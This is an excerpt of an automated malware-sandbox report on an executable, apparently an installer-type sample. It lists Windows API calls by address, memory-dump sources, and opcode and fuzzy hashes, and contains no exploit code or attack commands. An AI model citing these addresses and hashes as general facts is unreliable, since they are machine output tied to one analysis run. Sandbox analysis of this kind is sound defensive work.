                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                            • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,7014123B,?,701412DF,00000019,701411BE,-000000A0), ref: 70141225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 232f6760b2226768eb9ec6fb8a957ec5d9c08dec651cb6c23da15f55f1fcf2ef
                                                                                                            • Instruction ID: d387b1d519a766a77e9deb815cf26efd01da970645bbd491af2411d5608350cd
                                                                                                            • Opcode Fuzzy Hash: 232f6760b2226768eb9ec6fb8a957ec5d9c08dec651cb6c23da15f55f1fcf2ef
                                                                                                            • Instruction Fuzzy Hash: 7CB01276A00000DFEF008B65CC06F343254F701301F244010FB04C25B1C1604C108534
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A$Call
                                                                                                            • API String ID: 2624150263-413618503
                                                                                                            • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 7014121B: GlobalAlloc.KERNELBASE(00000040,?,7014123B,?,701412DF,00000019,701411BE,-000000A0), ref: 70141225
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 70141C6B
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 70141CB3
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 70141CBD
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70141CD0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70141DB2
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70141DB7
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70141DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70141FA6
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 70142140
                                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 701421B5
                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 701421C6
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 70142220
                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 7014223A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1972315766.0000000070141000.00000020.00000001.01000000.00000004.sdmp, Offset: 70140000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1972298784.0000000070140000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972332397.0000000070144000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1972350477.0000000070146000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70140000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 245916457-0
                                                                                                            • Opcode ID: 4e07fb0e6df39c8046a48b59af174c3ad7651c919119a138fcd36041712ffeb5
                                                                                                            • Instruction ID: bb7b36a60e967995b7bd51c3b5c5dab60d58bead1dc87b26841c23045da75072
                                                                                                            • Opcode Fuzzy Hash: 4e07fb0e6df39c8046a48b59af174c3ad7651c919119a138fcd36041712ffeb5
                                                                                                            • Instruction Fuzzy Hash: 5322AC71D0020ADFCB228FA4C9846EDB7F5FB04315F72656EF16AE36A0D7B05A858B50
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID:
                                                                                                            • API String ID: 542301482-0
                                                                                                            • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                            • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                            • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Call$N
                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\4UQ5wnI389.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                            • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                            • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                            • GetSysColor.USER32(?), ref: 0040444C
                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                            • DeleteObject.GDI32(?), ref: 00404476
                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1938953238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1938934541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938972156.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1938990466.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1939072407.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2320649405-0
                                                                                                            • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                            • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                            • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
